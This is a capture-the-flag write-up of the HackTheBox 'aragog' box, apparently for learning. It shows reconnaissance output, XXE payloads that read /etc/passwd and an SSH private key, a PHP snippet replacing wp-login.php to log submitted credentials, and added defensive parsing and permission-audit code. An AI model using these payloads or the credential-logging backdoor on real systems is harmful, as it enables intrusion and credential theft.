aragog (Linux)

Reconnaissance

# nmap -p- -sT --min-rate=100000 10.129.119.26
Starting Nmap 7.94SVN ( https://nmap.org/ ) at 2024-11-04 20:08 KST
Warning: 10.129.119.26 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.119.26
Host is up (0.28s latency).
Not shown: 61476 closed tcp ports (conn-refused), 4056 filtered tcp ports (no-response)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

# nmap -p 21,22,80 -sCV --min-rate=100000 10.129.119.26
Starting Nmap 7.94SVN ( https://nmap.org/ ) at 2024-11-04 20:10 KST
Nmap scan report for 10.129.119.26
Host is up (0.28s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.14.57
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|-r--r--r--    1 ftp      ftp            86 Dec 21  2017 test.txt
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ad:21:fb:50:16:d4:93:dc:b7:29:1f:4c:c2:61:16:48 (RSA)
|   256 2c:94:00:3c:57:2f:c2:49:77:24:aa:22:6a:43:7d:b1 (ECDSA)
|_  256 9a:ff:8b:e4:0e:98:70:52:29:68:0e:cc:a0:7d:5c:1f (ED25519)
80/tcp open  http    Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://aragog.htb/
Service Info: Host: aragog.htb; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.11 seconds
# ffuf -u http://aragog.htb/FUZZ.php -w directory-list-lowercase-2.3-big.txt

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://aragog.htb/FUZZ.php
 :: Wordlist         : FUZZ: /home/surckers/list/directory-list-lowercase-2.3-big.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

# Copyright 2007 James Fisher [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 281ms]
#                       [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 281ms]
# Priority ordered case insensative list, where entries were found  [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 282ms]
# directory-list-lowercase-2.3-big.txt [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 282ms]
                        [Status: 403, Size: 275, Words: 20, Lines: 10, Duration: 287ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/  [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 1775ms]
# Attribution-Share Alike 3.0 License. To view a copy of this  [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 2777ms]
#                       [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 2778ms]
# on atleast 1 host     [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 2780ms]
#                       [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 3782ms]
# This work is licensed under the Creative Commons  [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 4787ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 4789ms]
# or send a letter to Creative Commons, 171 Second Street,  [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 4790ms]
#                       [Status: 200, Size: 11321, Words: 3503, Lines: 376, Duration: 4790ms]
hosts                   [Status: 200, Size: 46, Words: 7, Lines: 4, Duration: 285ms]

 

 

FTP login (anonymous)

The test.txt file retrieved over anonymous FTP looks like an XML document.

Exploit

Trying XXE injection

<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<details>
    <subnet_mask>&ent;</subnet_mask>
    <test>
&ent;
    </test>
</details>

Wow~!

For the accounts with a /bin/bash shell that have a /home directory,

trying to read user.txt in their home directories fails:

/home/florian/user.txt

/home/cliff/user.txt

<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///home/florian/.ssh/id_rsa"> ]>
<details>
    <subnet_mask>&ent;</subnet_mask>
    <test>
&ent;
    </test>
</details>

The SSH private key, however, can be read.

Log into the server with that private key.

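The hosts page is parsing the submitted XML with entity resolution enabled, which is why the contents of `file:///etc/passwd` and `id_rsa` come back in the `<subnet_mask>` field. The Python below is an added example, not code from the box or this writeup: a parser for the `<details>` document that refuses any DOCTYPE before the parser can act on it, plus a cheap pre-parse screen that can be run over request bodies or logs. The benign document and the payload are constructed to match the shape of the requests above.

```python
import re
import xml.parsers.expat


class UnsafeXml(Exception):
    """Raised when a document carries a DTD, which every XXE payload needs."""


# Constructed samples (not captured from the box): the <details> document the
# hosts page is assumed to expect, and an XXE payload of the shape shown above.
BENIGN_XML = b"""<details>
    <subnet_mask>255.255.255.0</subnet_mask>
    <test>ok</test>
</details>"""

XXE_XML = b"""<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<details>
    <subnet_mask>&ent;</subnet_mask>
    <test>&ent;</test>
</details>"""


def looks_like_xxe(data: bytes) -> bool:
    """Pre-parse screen for a WAF rule or request log: a DOCTYPE or ENTITY
    declaration has no business in a <details> submission."""
    return re.search(rb"<!\s*(DOCTYPE|ENTITY)\b", data, re.IGNORECASE) is not None


def parse_details(data: bytes) -> dict:
    """Parse the flat <details> document into {tag: text}, refusing any DTD.

    Expat does not fetch external entities on its own, but rejecting the
    DOCTYPE up front also blocks internal-entity expansion tricks and keeps
    the behaviour independent of whatever the production parser's defaults are.
    """
    parser = xml.parsers.expat.ParserCreate()
    fields = {}
    depth = 0
    text = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Exceptions raised in a handler propagate out of parser.Parse().
        raise UnsafeXml("DOCTYPE declaration rejected: %s" % name)

    def on_entity_decl(*_):
        raise UnsafeXml("entity declaration rejected")

    def on_external_entity(context, base, system_id, public_id):
        return 0  # returning 0 makes expat abort instead of loading system_id

    def on_start(name, attrs):
        nonlocal depth
        depth += 1
        text.clear()

    def on_chars(chunk):
        text.append(chunk)

    def on_end(name):
        nonlocal depth
        if depth > 1:  # a child of the root element: record its text
            fields[name] = "".join(text).strip()
        depth -= 1
        text.clear()

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = on_chars
    parser.Parse(data, True)
    return fields


def rejects(data: bytes) -> bool:
    """True if parse_details refuses the document because of a DTD."""
    try:
        parse_details(data)
    except UnsafeXml:
        return True
    return False


if __name__ == "__main__":
    print("benign:", parse_details(BENIGN_XML))
    print("payload screened:", looks_like_xxe(XXE_XML), "rejected:", rejects(XXE_XML))
```

The two layers are deliberately independent: the regex screen gives a detection signal without touching a parser at all, while the handler-based rejection is what actually stops the document from being processed, so a payload that slips past one still hits the other.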
 

Privilege escalation

1. First, sudo -l => nothing

2. Going into the folder the web site is served from,

a WordPress site can be seen running there.

The DB credentials can be obtained from the wp-config.php file.

florian@aragog:/var/www/html/dev_wiki$ cat wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wp_wiki');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', '$@y6CHJ^$#5c37j$#6h');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

 

Access the DB with those credentials

florian@aragog:/var/www/html/dev_wiki$ mysql -u root -p -h localhost -D wp_wiki
Enter password:

 

 

hashcat could not recover the plaintext of the hash.
(The idea was to log in as admin and use the wp-admin file upload feature to upload malicious code. I wondered whether an uploaded file would be written with cliff's privileges..)

 

3. Ran linpeas

Transferred linpeas.sh with the scp command

scp -i id_rsa_florian linpeas.sh florian@10.129.118.255:/home/florian
linpeas.sh

The useful finding: a cron job is run as admin, and wp-login.py is executed under the cliff account.

It will call the login page, and the login credentials should be contained in that request.

Plan: modify the wp-login.php file to capture the data sent in that call.

 

<?php
$rrr = print_r($_REQUEST, true);
$fff = fopen("/dev/shm/df", "a");
fwrite($fff, $rrr);
fclose($fff);

After replacing the contents as above and changing the permissions with chmod +777,

the password can be obtained,

and with su, entering that password as root gives root access.

 
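The escalation above works for two reasons a defender can check for: a login user (florian) can rewrite wp-login.php, a file the web server executes, and a scheduled job then posts root's reused password to it. As an added example that is not part of this writeup, the Python script below audits a web root for files that a user other than the trusted owners could modify; the sample entries, including the assumed uid 1000 for the login user, are constructed.

```python
import os
import stat
from typing import Iterable, List, Sequence, Tuple

# (path, owner uid, permission bits): what scan_webroot collects with os.lstat,
# kept separate so the policy can also be checked on constructed data.
Entry = Tuple[str, int, int]

# Constructed sample, not a listing taken from the box: a WordPress tree where
# wp-login.php is owned by an ordinary login user (uid 1000 is assumed) and
# index.php is world-writable.
SAMPLE_ENTRIES: List[Entry] = [
    ("/var/www/html/dev_wiki/wp-login.php", 1000, 0o644),
    ("/var/www/html/dev_wiki/wp-config.php", 0, 0o640),
    ("/var/www/html/index.php", 0, 0o666),
    ("/var/www/html/dev_wiki/wp-includes/version.php", 0, 0o644),
]


def modifiable_by_untrusted(entries: Iterable[Entry],
                            trusted_uids: Sequence[int] = (0,)) -> List[str]:
    """Return the paths a user outside trusted_uids could rewrite: owned by an
    untrusted uid, or group-/world-writable.  Any such file the web server
    executes lets that user plant code that the server, and whatever logs
    into the site, will run."""
    flagged = []
    for path, uid, mode in entries:
        if uid not in trusted_uids or mode & (stat.S_IWGRP | stat.S_IWOTH):
            flagged.append(path)
    return flagged


def scan_webroot(root: str, trusted_uids: Sequence[int] = (0,)) -> List[str]:
    """Walk a real web root and apply the same policy; symlinks are not followed."""
    entries: List[Entry] = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable entry: skip, do not abort the audit
            if stat.S_ISREG(st.st_mode):
                entries.append((path, st.st_uid, stat.S_IMODE(st.st_mode)))
    return modifiable_by_untrusted(entries, trusted_uids)


if __name__ == "__main__":
    for path in modifiable_by_untrusted(SAMPLE_ENTRIES):
        print("untrusted write access:", path)
```

Run `scan_webroot("/var/www/html")` on a live host to get the real list; the web server account itself should not be in `trusted_uids` either, since PHP files it can write are the usual place a web shell persists.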

 

2776th~!
